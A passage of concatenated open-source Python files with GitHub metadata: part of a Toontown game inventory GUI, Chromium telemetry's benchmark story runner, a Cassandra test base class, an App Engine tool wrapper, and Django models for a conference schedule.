self.trackBars[trackIndex]['text'] = TTLocalizer.InventoryTrackExp % {'curExp': curExp,
'nextExp': nextExp}
def updateInvString(self, invString):
InventoryBase.InventoryBase.updateInvString(self, invString)
self.updateGUI()
return None
def updateButton(self, track, level):
button = self.buttons[track][level]
button['text'] = str(self.numItem(track, level))
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
bonus = organicBonus or propBonus
if bonus:
textScale = 0.05
else:
textScale = 0.04
button.configure(text_scale=textScale)
def buttonBoing(self, track, level):
button = self.buttons[track][level]
oldScale = button.getScale()
s = Sequence(button.scaleInterval(0.1, oldScale * 1.333, blendType='easeOut'), button.scaleInterval(0.1, oldScale, blendType='easeIn'), name='inventoryButtonBoing-' + str(self.this))
s.start()
def updateGUI(self, track = None, level = None):
self.updateTotalPropsText()
if track == None and level == None:
for track in range(len(Tracks)):
curExp, nextExp = self.getCurAndNextExpValues(track)
if curExp >= UnpaidMaxSkills[track] and self.toon.getGameAccess() != OTPGlobals.AccessFull:
self.trackBars[track]['range'] = nextExp
self.trackBars[track]['text'] = TTLocalizer.InventoryGuestExp
elif curExp >= regMaxSkill:
self.trackBars[track]['text'] = TTLocalizer.InventoryUberTrackExp % {'nextExp': MaxSkill - curExp}
self.trackBars[track]['value'] = curExp - regMaxSkill
else:
self.trackBars[track]['text'] = TTLocalizer.InventoryTrackExp % {'curExp': curExp,
'nextExp': nextExp}
self.trackBars[track]['value'] = curExp
for level in range(0, len(Levels[track])):
self.updateButton(track, level)
for x in xrange(0, len(Tracks)):
if self.toon.hasTrackAccess(x):
self.trackTabs[x].show()
else:
self.trackTabs[x].hide()
elif track != None and level != None:
self.updateButton(track, level)
else:
self.notify.error('Invalid use of updateGUI')
self.doTab(self.activeTab)
self.__activateButtons()
return
def getSingleGroupStr(self, track, level):
if track == HEAL_TRACK:
if isGroup(track, level):
return TTLocalizer.InventoryAffectsAllToons
else:
return TTLocalizer.InventoryAffectsOneToon
elif isGroup(track, level):
return TTLocalizer.InventoryAffectsAllCogs
else:
return TTLocalizer.InventoryAffectsOneCog
def getToonupDmgStr(self, track, level):
if track == HEAL_TRACK:
return TTLocalizer.InventoryHealString
elif track == LURE_TRACK:
return TTLocalizer.InventoryLureString
else:
return TTLocalizer.InventoryDamageString
def deleteItem(self, track, level):
if self.numItem(track, level) > 0:
self.useItem(track, level)
self.updateGUI(track, level)
def loadBattleFrame(self):
battleModels = loader.loadModel('phase_3.5/models/gui/battle_gui_new')
self.levelsButton = DirectButton(self, relief=None, pos=(0.675, 0, -0.5), text='', text_scale=TTLocalizer.INlevelsButton, text_fg=Vec4(1, 1, 1, 1), textMayChange=1, image=(self.upButton, self.downButton, self.rolloverButton), image_scale=(2.5, 1.05, 1), image_color=(1, 0.6, 0, 1), command=self.__handleLevels)
self.battleFrame = DirectFrame(relief=None, parent=self)
self.runButton = DirectButton(parent=self.battleFrame, relief=None, pos=(1.4, 0, -0.5), text=TTLocalizer.InventoryRun, text_scale=TTLocalizer.INrunButton, text_pos=(0, -0.02), text_fg=Vec4(1, 1, 1, 1), textMayChange=0, image=(self.upButton, self.downButton, self.rolloverButton), image_scale=(2, 1.05, 1), image_color=(0, 0.6, 1, 1), command=self.__handleRun)
self.sosButton = DirectButton(parent=self.battleFrame, relief=None, pos=(1.45, 0, -0.7), text=TTLocalizer.InventorySOS, text_scale=0.05, text_pos=(0, -0.02), text_fg=Vec4(1, 1, 1, 1), textMayChange=0, image=(self.upButton, self.downButton, self.rolloverButton), image_scale=(2, 1.05, 1), image_color=(0, 0.6, 1, 1), command=self.__handleSOS)
self.passButton = DirectButton(parent=self.battleFrame, relief=None, pos=(1.45, 0, -0.6), text=TTLocalizer.InventoryPass, text_scale=TTLocalizer.INpassButton, text_pos=(0, -0.02), text_fg=Vec4(1, 1, 1, 1), textMayChange=1, image=(self.upButton, self.downButton, self.rolloverButton), image_scale=(2, 1.05, 1), image_color=(0, 0.6, 1, 1), command=self.__handlePass)
self.fireButton = DirectButton(parent=self.battleFrame, relief=None, pos=(1.4, 0, -0.8), text=TTLocalizer.InventoryFire, text_scale=TTLocalizer.INfireButton, text_pos=(0, -0.02), text_fg=Vec4(1, 1, 1, 1), textMayChange=0, image=(self.upButton, self.downButton, self.rolloverButton), image_scale=(2, 1.05, 1), image_color=(0, 0.6, 1, 1), command=self.__handleFire)
self.tutText = DirectFrame(parent=self.battleFrame, relief=None, pos=(-1, 0, -0.1133), scale=0.143, image=DGG.getDefaultDialogGeom(), image_scale=5.125, image_pos=(0, 0, -0.65), image_color=ToontownGlobals.GlobalDialogColor, text_scale=TTLocalizer.INclickToAttack, text=TTLocalizer.InventoryClickToAttack, textMayChange=0)
self.tutText.hide()
self.tutArrows = BlinkingArrows.BlinkingArrows(parent=self.battleFrame)
battleModels.removeNode()
self.levelsButton.hide()
self.battleFrame.hide()
return
def loadPurchaseFrame(self):
self.purchaseFrame = DirectFrame(relief=None, parent=self)
self.purchaseFrame.setX(-.06)
self.purchaseFrame.hide()
return
def loadStorePurchaseFrame(self):
self.storePurchaseFrame = DirectFrame(relief=None, parent=self)
self.storePurchaseFrame.hide()
return
def buttonLookup(self, track, level):
return self.invModels[track][level]
def enterTrackFrame(self, track, guiItem):
messenger.send('enterTrackFrame', [track])
def exitTrackFrame(self, track, guiItem):
messenger.send('exitTrackFrame', [track])
def checkPropBonus(self, track):
result = False
if track == self._interactivePropTrackBonus:
result = True
return result
def stopAndClearPropBonusIval(self):
if self.propBonusIval and self.propBonusIval.isPlaying():
self.propBonusIval.finish()
self.propBonusIval = Parallel(name='dummyPropBonusIval')
def addToPropBonusIval(self, button):
flashObject = button
try:
flashObject = button.component('image0')
except:
pass
goDark = LerpColorScaleInterval(flashObject, 0.5, Point4(0.1, 0.1, 0.1, 1.0), Point4(1, 1, 1, 1), blendType='easeIn')
goBright = LerpColorScaleInterval(flashObject, 0.5, Point4(1, 1, 1, 1), Point4(0.1, 0.1, 0.1, 1.0), blendType='easeOut')
newSeq = Sequence(goDark, goBright, Wait(0.2))
self.propBonusIval.append(newSeq)
|
{
"content_hash": "53af7a09c8fd059b7549ccd597ea0d2d",
"timestamp": "",
"source": "github",
"line_count": 1347,
"max_line_length": 471,
"avg_line_length": 46.01187824795843,
"alnum_prop": 0.6103778760205234,
"repo_name": "silly-wacky-3-town-toon/SOURCE-COD",
"id": "7e4a6abc7d54aaa0a587b425fcf98d18b4978955",
"size": "61978",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "toontown/toon/InventoryNewNEW.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "10249"
},
{
"name": "C",
"bytes": "1752256"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "5485400"
},
{
"name": "Emacs Lisp",
"bytes": "210083"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Makefile",
"bytes": "895"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "NSIS",
"bytes": "1009050"
},
{
"name": "Objective-C",
"bytes": "21821"
},
{
"name": "PLSQL",
"bytes": "10200"
},
{
"name": "Pascal",
"bytes": "4986"
},
{
"name": "Perl6",
"bytes": "30612"
},
{
"name": "Puppet",
"bytes": "259"
},
{
"name": "Python",
"bytes": "33566014"
},
{
"name": "Shell",
"bytes": "14642"
},
{
"name": "Tcl",
"bytes": "2084458"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
from __future__ import absolute_import
import contextlib
import itertools
import logging
import optparse # pylint: disable=deprecated-module
import os
import re
import sys
import time
try:
import psutil
except ImportError:
psutil = None
import py_utils
from py_utils import cloud_storage # pylint: disable=import-error
from py_utils import logging_util # pylint: disable=import-error
from py_utils.constants import exit_codes
from telemetry.core import exceptions
from telemetry.internal.actions import page_action
from telemetry.internal.browser import browser_finder
from telemetry.internal.browser import browser_finder_exceptions
from telemetry.internal.results import results_options
from telemetry.internal.util import exception_formatter
from telemetry import page
from telemetry.page import legacy_page_test
from telemetry.story import story_filter as story_filter_module
from telemetry.util import wpr_modes
from telemetry.web_perf import story_test
# Allowed stages to pause for user interaction at.
_PAUSE_STAGES = ('before-start-browser', 'after-start-browser',
'before-run-story', 'after-run-story')
_UNHANDLEABLE_ERRORS = (
SystemExit,
KeyboardInterrupt,
ImportError,
MemoryError)
# Benchmark names must match this regex. Note it has to be kept in sync with
# the corresponding pattern defined in tools/perf/core/perf_data_generator.py.
_RE_VALID_TEST_SUITE_NAME = r'^[\w._-]+$'
class ArchiveError(Exception):
pass
def AddCommandLineArgs(parser):
story_filter_module.StoryFilterFactory.AddCommandLineArgs(parser)
group = optparse.OptionGroup(parser, 'Story runner options')
# Note that the default for pageset-repeat is 1 unless the benchmark
# specifies a different default by adding
# `options = {'pageset_repeat': X}` in their benchmark. Defaults are always
# overridden by passed in commandline arguments.
group.add_option('--pageset-repeat', default=1, type='int',
help='Number of times to repeat the entire pageset. ')
# TODO(crbug.com/910809): Add flag to reduce iterations to 1.
# (An iteration is a repeat of the benchmark without restarting Chrome. It
# must be supported in benchmark-specific code.) This supports the smoke
# test use case since we don't want to waste time with iterations in smoke
# tests.
group.add_option('--max-failures', default=None, type='int',
help='Maximum number of test failures before aborting '
'the run. Defaults to the number specified by the '
'PageTest.')
group.add_option('--pause', dest='pause', default=None,
choices=_PAUSE_STAGES,
help='Pause for interaction at the specified stage. '
'Valid stages are %s.' % ', '.join(_PAUSE_STAGES))
group.add_option('--suppress-gtest-report', action='store_true',
help='Suppress gtest style report of progress as stories '
'are being run.')
group.add_option('--skip-typ-expectations-tags-validation',
action='store_true',
help='Suppress typ expectation tags validation errors.')
parser.add_option_group(group)
group = optparse.OptionGroup(parser, 'Web Page Replay options')
group.add_option(
'--use-live-sites',
dest='use_live_sites', action='store_true',
help='Run against live sites and ignore the Web Page Replay archives.')
parser.add_option_group(group)
parser.add_option('-p', '--print-only', dest='print_only',
choices=['stories', 'tags', 'both'], default=None)
parser.add_option('-w', '--wait-for-cpu-temp',
dest='wait_for_cpu_temp', action='store_true',
default=False,
help='Introduces a wait between each story '
'until the device CPU has cooled down. If '
'not specified, this wait is disabled. '
'Device must be supported. ')
def ProcessCommandLineArgs(parser, args, environment=None):
story_filter_module.StoryFilterFactory.ProcessCommandLineArgs(
parser, args, environment)
if args.pageset_repeat < 1:
parser.error('--pageset-repeat must be a positive integer.')
@contextlib.contextmanager
def CaptureLogsAsArtifacts(results):
with results.CreateArtifact('logs.txt') as log_file:
with logging_util.CaptureLogs(log_file):
yield
def _RunStoryAndProcessErrorIfNeeded(
story, results, state, test, finder_options):
def ProcessError(log_message):
logging.exception(log_message)
state.DumpStateUponStoryRunFailure(results)
# Note: calling Fail on the results object also normally causes the
# progress_reporter to log it in the output.
results.Fail('Exception raised running %s' % story.name)
with CaptureLogsAsArtifacts(results):
try:
has_existing_exception = False
if isinstance(test, story_test.StoryTest):
test.WillRunStory(state.platform, story)
state.WillRunStory(story)
if not state.CanRunStory(story):
results.Skip(
'Skipped because story is not supported '
'(SharedState.CanRunStory() returns False).')
return
if hasattr(state, 'browser') and state.browser:
state.browser.CleanupUnsymbolizedMinidumps()
story.wpr_mode = state.wpr_mode
if finder_options.periodic_screenshot_frequency_ms:
state.browser.StartCollectingPeriodicScreenshots(
finder_options.periodic_screenshot_frequency_ms)
state.RunStory(results)
if isinstance(test, story_test.StoryTest):
test.Measure(state.platform, results)
except page_action.PageActionNotSupported as exc:
has_existing_exception = True
results.Skip('Unsupported page action: %s' % exc)
except (legacy_page_test.Failure, exceptions.TimeoutException,
exceptions.LoginException, py_utils.TimeoutException):
has_existing_exception = True
ProcessError(log_message='Handleable error')
except _UNHANDLEABLE_ERRORS:
has_existing_exception = True
ProcessError(log_message=('Unhandleable error. '
'Benchmark run will be interrupted'))
raise
except Exception: # pylint: disable=broad-except
has_existing_exception = True
ProcessError(log_message=('Possibly handleable error. '
'Will try to restart shared state'))
# The caller, RunStorySet, will catch this exception, destory and
# create a new shared state.
raise
finally:
if finder_options.periodic_screenshot_frequency_ms:
state.browser.StopCollectingPeriodicScreenshots()
try:
if hasattr(state, 'browser') and state.browser:
try:
state.browser.CleanupUnsymbolizedMinidumps(fatal=True)
except Exception: # pylint: disable=broad-except
exception_formatter.PrintFormattedException(
msg='Exception raised when cleaning unsymbolized minidumps: ')
state.DumpStateUponStoryRunFailure(results)
results.Fail(sys.exc_info())
# We attempt to stop tracing and/or metric collecting before possibly
# closing the browser. Closing the browser first and stopping tracing
# later appeared to cause issues where subsequent browser instances
# would not launch correctly on some devices (see: crbug.com/720317).
# The following normally cause tracing and/or metric collecting to stop.
if isinstance(test, story_test.StoryTest):
test.DidRunStory(state.platform, results)
else:
test.DidRunPage(state.platform)
# And the following normally causes the browser to be closed.
state.DidRunStory(results)
except Exception: # pylint: disable=broad-except
if not has_existing_exception:
state.DumpStateUponStoryRunFailure(results)
raise
# Print current exception and propagate existing exception.
exception_formatter.PrintFormattedException(
msg='Exception raised when cleaning story run: ')
def _GetPossibleBrowser(finder_options):
"""Return a possible_browser with the given options."""
possible_browser = browser_finder.FindBrowser(finder_options)
if not possible_browser:
raise browser_finder_exceptions.BrowserFinderException(
'Cannot find browser of type %s. \n\nAvailable browsers:\n%s\n' % (
finder_options.browser_options.browser_type,
'\n'.join(browser_finder.GetAllAvailableBrowserTypes(
finder_options))))
finder_options.browser_options.browser_type = possible_browser.browser_type
return possible_browser
def RunStorySet(test, story_set, finder_options, results,
max_failures=None, found_possible_browser=None):
"""Runs a test against a story_set with the given options.
Stop execution for unexpected exceptions such as KeyboardInterrupt. Some
other exceptions are handled and recorded before allowing the remaining
stories to run.
Args:
test: Either a StoryTest or a LegacyPageTest instance.
story_set: A StorySet instance with the set of stories to run.
finder_options: The parsed command line options to customize the run.
results: A PageTestResults object used to collect results and artifacts.
max_failures: Max number of story run failures allowed before aborting
the entire story run. It's overriden by finder_options.max_failures
if given.
found_possible_broswer: The possible version of browser to use. We don't
need to find again if this is given.
expectations: Benchmark expectations used to determine disabled stories.
"""
stories = story_set.stories
for s in stories:
ValidateStory(s)
if found_possible_browser:
possible_browser = found_possible_browser
finder_options.browser_options.browser_type = possible_browser.browser_type
else:
possible_browser = _GetPossibleBrowser(finder_options)
if (finder_options.periodic_screenshot_frequency_ms and
possible_browser.target_os == "android"):
raise ValueError("Periodic screenshots are not compatible with Android!")
logging.info('Running in Python version: %s' % str(sys.version_info))
platform_tags = possible_browser.GetTypExpectationsTags()
logging.info('The following expectations condition tags were generated %s',
str(platform_tags))
abridged_story_set_tag = story_set.GetAbridgedStorySetTagFilter()
story_filter = story_filter_module.StoryFilterFactory.BuildStoryFilter(
results.benchmark_name, platform_tags, abridged_story_set_tag)
stories = story_filter.FilterStories(stories)
wpr_archive_info = story_set.wpr_archive_info
# Sort the stories based on the archive name, to minimize how often the
# network replay-server needs to be restarted.
if wpr_archive_info:
stories = sorted(
stories,
key=lambda story: wpr_archive_info.WprFilePathForStory(story) or '')
if finder_options.print_only:
if finder_options.print_only == 'tags':
tags = set(itertools.chain.from_iterable(s.tags for s in stories))
print('List of tags:\n%s' % '\n'.join(tags))
return
include_tags = finder_options.print_only == 'both'
if include_tags:
format_string = ' %%-%ds %%s' % max(len(s.name) for s in stories)
else:
format_string = '%s%s'
for s in stories:
print(format_string % (s.name, ','.join(s.tags) if include_tags else ''))
return
if (not finder_options.use_live_sites and
finder_options.browser_options.wpr_mode != wpr_modes.WPR_RECORD):
# Get the serving dirs of the filtered stories.
# TODO(crbug.com/883798): removing story_set._serving_dirs
serving_dirs = story_set._serving_dirs.copy()
for story in stories:
if story.serving_dir:
serving_dirs.add(story.serving_dir)
if story_set.bucket:
for directory in serving_dirs:
cloud_storage.GetFilesInDirectoryIfChanged(directory,
story_set.bucket)
if story_set.archive_data_file and not _UpdateAndCheckArchives(
story_set.archive_data_file, wpr_archive_info, stories, story_filter):
return
if not stories:
return
if psutil:
# Log available disk space before running the benchmark.
logging.info(
'Disk usage before running tests: %s.' % str(psutil.disk_usage('.')))
# Effective max failures gives priority to command-line flag value.
effective_max_failures = finder_options.max_failures
if effective_max_failures is None:
effective_max_failures = max_failures
state = None
# TODO(crbug.com/866458): unwind the nested blocks
# pylint: disable=too-many-nested-blocks
try:
has_existing_exception = False
pageset_repeat = finder_options.pageset_repeat
for storyset_repeat_counter in range(pageset_repeat):
for story in stories:
if not state:
# Construct shared state by using a copy of finder_options. Shared
# state may update the finder_options. If we tear down the shared
# state after this story run, we want to construct the shared
# state for the next story from the original finder_options.
state = story_set.shared_state_class(
test, finder_options.Copy(), story_set, possible_browser)
with results.CreateStoryRun(story, storyset_repeat_counter):
skip_reason = story_filter.ShouldSkip(story)
if skip_reason:
results.Skip(skip_reason)
continue
if results.benchmark_interrupted:
results.Skip(results.benchmark_interruption, expected=False)
continue
try:
if state.platform:
state.platform.WaitForBatteryTemperature(35)
if finder_options.wait_for_cpu_temp:
state.platform.WaitForCpuTemperature(38.0)
_WaitForThermalThrottlingIfNeeded(state.platform)
_RunStoryAndProcessErrorIfNeeded(story, results, state, test,
finder_options)
except _UNHANDLEABLE_ERRORS as exc:
has_existing_exception = True
interruption = (
'Benchmark execution interrupted by a fatal exception: %r' %
exc)
results.InterruptBenchmark(interruption)
exception_formatter.PrintFormattedException()
except Exception: # pylint: disable=broad-except
has_existing_exception = True
logging.exception('Exception raised during story run.')
results.Fail(sys.exc_info())
# For all other errors, try to give the rest of stories a chance
# to run by tearing down the state and creating a new state
# instance in the next iteration.
try:
# If TearDownState raises, do not catch the exception.
# (The Error was saved as a failure value.)
state.TearDownState()
except Exception as exc: # pylint: disable=broad-except
interruption = (
'Benchmark execution interrupted by a fatal exception: %r' %
exc)
results.InterruptBenchmark(interruption)
exception_formatter.PrintFormattedException()
finally:
# Later finally-blocks use state, so ensure it is cleared.
state = None
finally:
if state and state.platform:
_CheckThermalThrottling(state.platform)
if (effective_max_failures is not None and
results.num_failed > effective_max_failures):
interruption = (
'Too many stories failed. Aborting the rest of the stories.')
results.InterruptBenchmark(interruption)
finally:
if state:
try:
state.TearDownState()
except Exception: # pylint: disable=broad-except
if not has_existing_exception:
raise
# Print current exception and propagate existing exception.
exception_formatter.PrintFormattedException(
msg='Exception from TearDownState:')
def ValidateStory(story):
if len(story.name) > 180:
raise ValueError(
'User story has name exceeding 180 characters: %s' %
story.name)
def _ShouldRunBenchmark(benchmark, possible_browser, finder_options):
if finder_options.print_only:
return True # Should always run on print-only mode.
if benchmark.CanRunOnPlatform(possible_browser.platform, finder_options):
return True
print('Benchmark "%s" is not supported on the current platform. If this '
"is in error please add it to the benchmark's SUPPORTED_PLATFORMS."
% benchmark.Name())
return False
def RunBenchmark(benchmark, finder_options):
"""Run this test with the given options.
Returns:
An exit code from exit_codes module describing what happened.
"""
benchmark_name = benchmark.Name()
if not re.match(_RE_VALID_TEST_SUITE_NAME, benchmark_name):
logging.fatal('Invalid benchmark name: %s', benchmark_name)
return 2 # exit_codes.FATAL_ERROR
possible_browser = browser_finder.FindBrowser(finder_options)
if not possible_browser:
print('No browser of type "%s" found for running benchmark "%s".' % (
finder_options.browser_options.browser_type, benchmark.Name()))
return exit_codes.ALL_TESTS_SKIPPED
benchmark.CustomizeOptions(finder_options, possible_browser)
with results_options.CreateResults(
finder_options,
benchmark_name=benchmark_name,
benchmark_description=benchmark.Description(),
report_progress=not finder_options.suppress_gtest_report) as results:
if not _ShouldRunBenchmark(benchmark, possible_browser, finder_options):
return exit_codes.ALL_TESTS_SKIPPED
test = benchmark.CreatePageTest(finder_options)
test.__name__ = benchmark.__class__.__name__
story_set = benchmark.CreateStorySet(finder_options)
if isinstance(test, legacy_page_test.LegacyPageTest):
if any(not isinstance(p, page.Page) for p in story_set.stories):
raise Exception(
'PageTest must be used with StorySet containing only '
'telemetry.page.Page stories.')
results.AddSharedDiagnostics(
architecture=possible_browser.platform.GetArchName(),
device_id=possible_browser.platform.GetDeviceId(),
os_name=possible_browser.platform.GetOSName(),
os_version=possible_browser.platform.GetOSVersionName(),
os_detail_vers=possible_browser.platform.GetOSVersionDetailString(),
owners=benchmark.GetOwners(),
bug_components=benchmark.GetBugComponents(),
documentation_urls=benchmark.GetDocumentationLinks(),
info_blurb=benchmark.GetInfoBlurb(),
)
try:
RunStorySet(
test, story_set, finder_options, results, benchmark.max_failures,
possible_browser)
if results.benchmark_interrupted:
return_code = exit_codes.FATAL_ERROR
elif results.had_failures:
return_code = exit_codes.TEST_FAILURE
elif results.had_successes:
return_code = exit_codes.SUCCESS
else:
return_code = exit_codes.ALL_TESTS_SKIPPED
except Exception as exc: # pylint: disable=broad-except
interruption = 'Benchmark execution interrupted: %r' % exc
results.InterruptBenchmark(interruption)
exception_formatter.PrintFormattedException()
return_code = exit_codes.FATAL_ERROR
return return_code
def _UpdateAndCheckArchives(archive_data_file, wpr_archive_info,
filtered_stories, story_filter):
"""Verifies that all stories are local or have WPR archives.
Logs warnings and returns False if any are missing.
"""
# Report any problems with the entire story set.
story_names = [s.name for s in filtered_stories
if not s.is_local and not story_filter.ShouldSkip(s)]
if story_names:
if not archive_data_file:
logging.error('The story set is missing an "archive_data_file" '
'property.\nTo run from live sites pass the flag '
'--use-live-sites.\nTo create an archive file add an '
'archive_data_file property to the story set and then '
'run record_wpr.')
raise ArchiveError('No archive data file.')
if not wpr_archive_info:
logging.error('The archive info file is missing.\n'
'To fix this, either add svn-internal to your '
'.gclient using http://goto/read-src-internal, '
'or create a new archive using record_wpr.')
raise ArchiveError('No archive info file.')
wpr_archive_info.DownloadArchivesIfNeeded(story_names=story_names)
# Report any problems with individual story.
stories_missing_archive_path = []
stories_missing_archive_data = []
for story in filtered_stories:
if not story.is_local and not story_filter.ShouldSkip(story):
archive_path = wpr_archive_info.WprFilePathForStory(story)
if not archive_path:
stories_missing_archive_path.append(story)
elif not os.path.isfile(archive_path):
stories_missing_archive_data.append(story)
if stories_missing_archive_path:
logging.error(
'The story set archives for some stories do not exist.\n'
'To fix this, record those stories using record_wpr.\n'
'To ignore this warning and run against live sites, '
'pass the flag --use-live-sites.')
logging.error(
'stories without archives: %s',
', '.join(story.name
for story in stories_missing_archive_path))
if stories_missing_archive_data:
logging.error(
'The story set archives for some stories are missing.\n'
'Someone forgot to check them in, uploaded them to the '
'wrong cloud storage bucket, or they were deleted.\n'
'To fix this, record those stories using record_wpr.\n'
'To ignore this warning and run against live sites, '
'pass the flag --use-live-sites.')
logging.error(
'stories missing archives: %s',
', '.join(story.name
for story in stories_missing_archive_data))
if stories_missing_archive_path or stories_missing_archive_data:
raise ArchiveError('Archive file is missing stories.')
# Only run valid stories if no problems with the story set or
# individual stories.
return True
def _WaitForThermalThrottlingIfNeeded(platform):
if not platform.CanMonitorThermalThrottling():
return
thermal_throttling_retry = 0
while (platform.IsThermallyThrottled() and
thermal_throttling_retry < 3):
logging.warning('Thermally throttled, waiting (%d)...',
thermal_throttling_retry)
thermal_throttling_retry += 1
time.sleep(thermal_throttling_retry * 2)
if thermal_throttling_retry and platform.IsThermallyThrottled():
logging.warning('Device is thermally throttled before running '
'performance tests, results will vary.')
def _CheckThermalThrottling(platform):
if not platform.CanMonitorThermalThrottling():
return
if platform.HasBeenThermallyThrottled():
logging.warning('Device has been thermally throttled during '
'performance tests, results will vary.')
|
{
"content_hash": "0084b3238a3f14d0b67f0a11ba38572c",
"timestamp": "",
"source": "github",
"line_count": 568,
"max_line_length": 80,
"avg_line_length": 41.434859154929576,
"alnum_prop": 0.6775015933715742,
"repo_name": "catapult-project/catapult",
"id": "ae0b4c08fd409ef303cb9db552eafb5ea532fd36",
"size": "23698",
"binary": false,
"copies": "6",
"ref": "refs/heads/main",
"path": "telemetry/telemetry/internal/story_runner.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1324"
},
{
"name": "C++",
"bytes": "46069"
},
{
"name": "CSS",
"bytes": "23376"
},
{
"name": "Dockerfile",
"bytes": "1541"
},
{
"name": "Go",
"bytes": "114396"
},
{
"name": "HTML",
"bytes": "12394298"
},
{
"name": "JavaScript",
"bytes": "1559584"
},
{
"name": "Makefile",
"bytes": "1774"
},
{
"name": "Python",
"bytes": "6778695"
},
{
"name": "Shell",
"bytes": "2288"
}
],
"symlink_target": ""
}
|
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
import sys
from cassandra.cqlengine.connection import get_session
class BaseCassEngTestCase(unittest.TestCase):
session = None
def setUp(self):
self.session = get_session()
def assertHasAttr(self, obj, attr):
self.assertTrue(hasattr(obj, attr),
"{0} doesn't have attribute: {1}".format(obj, attr))
def assertNotHasAttr(self, obj, attr):
self.assertFalse(hasattr(obj, attr),
"{0} shouldn't have the attribute: {1}".format(obj, attr))
if sys.version_info > (3, 0):
def assertItemsEqual(self, first, second, msg=None):
return self.assertCountEqual(first, second, msg)
|
{
"content_hash": "23827ceffd002962938328903eb260eb",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 74,
"avg_line_length": 27,
"alnum_prop": 0.6481481481481481,
"repo_name": "tempbottle/python-driver",
"id": "856f2bac4fa170bbfc4ba5e2dcf01c6016c792b5",
"size": "1330",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "tests/integration/cqlengine/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "28918"
},
{
"name": "Python",
"bytes": "1711786"
}
],
"symlink_target": ""
}
|
"""Convenience wrapper for starting an appengine tool."""
import os
import sys
if not hasattr(sys, 'version_info'):
sys.stderr.write('Very old versions of Python are not supported. Please '
'use version 2.5 or greater.\n')
sys.exit(1)
version_tuple = tuple(sys.version_info[:2])
if version_tuple < (2, 4):
sys.stderr.write('Error: Python %d.%d is not supported. Please use '
'version 2.5 or greater.\n' % version_tuple)
sys.exit(1)
if version_tuple == (2, 4):
sys.stderr.write('Warning: Python 2.4 is not supported; this program may '
'break. Please use version 2.5 or greater.\n')
DIR_PATH = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
SCRIPT_DIR = os.path.join(DIR_PATH, 'google', 'appengine', 'tools')
EXTRA_PATHS = [
DIR_PATH,
os.path.join(DIR_PATH, 'lib', 'antlr3'),
os.path.join(DIR_PATH, 'lib', 'django'),
os.path.join(DIR_PATH, 'lib', 'webob'),
os.path.join(DIR_PATH, 'lib', 'yaml', 'lib'),
]
SCRIPT_EXCEPTIONS = {
"dev_appserver.py" : "dev_appserver_main.py"
}
def run_file(file_path, globals_, script_dir=SCRIPT_DIR):
"""Execute the file at the specified path with the passed-in globals."""
sys.path = EXTRA_PATHS + sys.path
script_name = os.path.basename(file_path)
script_name = SCRIPT_EXCEPTIONS.get(script_name, script_name)
script_path = os.path.join(script_dir, script_name)
execfile(script_path, globals_)
if __name__ == '__main__':
run_file(__file__, globals())
|
{
"content_hash": "c484916de225325edba744333472dea3",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 76,
"avg_line_length": 34.04545454545455,
"alnum_prop": 0.6528704939919893,
"repo_name": "jamslevy/gsoc",
"id": "9bda605d480b8b88c26f70d1a19126ad349565fc",
"size": "2099",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "thirdparty/google_appengine/bulkloader.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "400472"
},
{
"name": "JavaScript",
"bytes": "388268"
},
{
"name": "Perl",
"bytes": "66733"
},
{
"name": "Python",
"bytes": "8290513"
},
{
"name": "Shell",
"bytes": "5570"
}
],
"symlink_target": ""
}
|
from datetime import datetime
import bleach
import markdown
from django.db import models
""" Presentation """
class Speaker(models.Model):
""" Who """
email = models.EmailField(unique=True)
full_name = models.CharField(max_length=255)
bio = models.TextField(default='')
twitter_username = models.CharField(max_length=255, null=True, blank=True)
company_name = models.CharField(max_length=255, null=True, blank=True)
url = models.URLField(max_length=2048, null=True, blank=True)
shirt_size = models.CharField(max_length=255)
location = models.CharField(max_length=255, null=True, blank=True)
is_keynote = models.BooleanField(default=False)
def __str__(self):
return self.full_name
@property
def twitter_url(self):
if not self.twitter_username:
return None
return 'https://twitter.com/{}'.format(self.twitter_username)
def bio_html(self):
return markdown.markdown(bleach.clean(self.bio), extensions=["extra"], safe_mode=False)
class Presentation(models.Model):
""" What """
papercall_id = models.IntegerField(null=True, blank=True, unique=True)
title = models.CharField(max_length=255)
description = models.TextField(default='')
notes = models.TextField(default='')
abstract = models.TextField(default='')
audience_level = models.CharField(max_length=255)
presentation_format = models.CharField(max_length=255)
speaker = models.ForeignKey(Speaker)
def __str__(self):
return self.title
class Meta:
ordering = ('title',)
def description_html(self):
return markdown.markdown(bleach.clean(self.description), extensions=["extra"], safe_mode=False)
@property
def is_tutorial(self):
return self.slotevent.location.track == Location.Tracks.TRACK_TUTORIAL
""" Schedule """
class Schedule(models.Model):
""" When (what day) """
day = models.DateField(unique=True)
def __str__(self):
return self.day.strftime('%b %d')
class Location(models.Model):
""" Where """
class Tracks(object):
TRACK_ONE = 'track-1'
TRACK_TWO = 'track-2'
TRACK_THREE = 'track-3'
TRACK_TUTORIAL = 'tutorial'
choices = (
(TRACK_ONE, 'Track 1'),
(TRACK_TWO, 'Track 2'),
(TRACK_THREE, 'Track 3'),
(TRACK_TUTORIAL, 'Tutorial'),
)
name = models.CharField(max_length=255)
order = models.PositiveIntegerField(default=0)
capacity = models.PositiveIntegerField(default=0)
notes = models.TextField(default='', blank=True)
track = models.CharField(max_length=255, choices=Tracks.choices, null=True, blank=True)
def __str__(self):
return self.name
class ScheduleSlot(models.Model):
""" When (what time) """
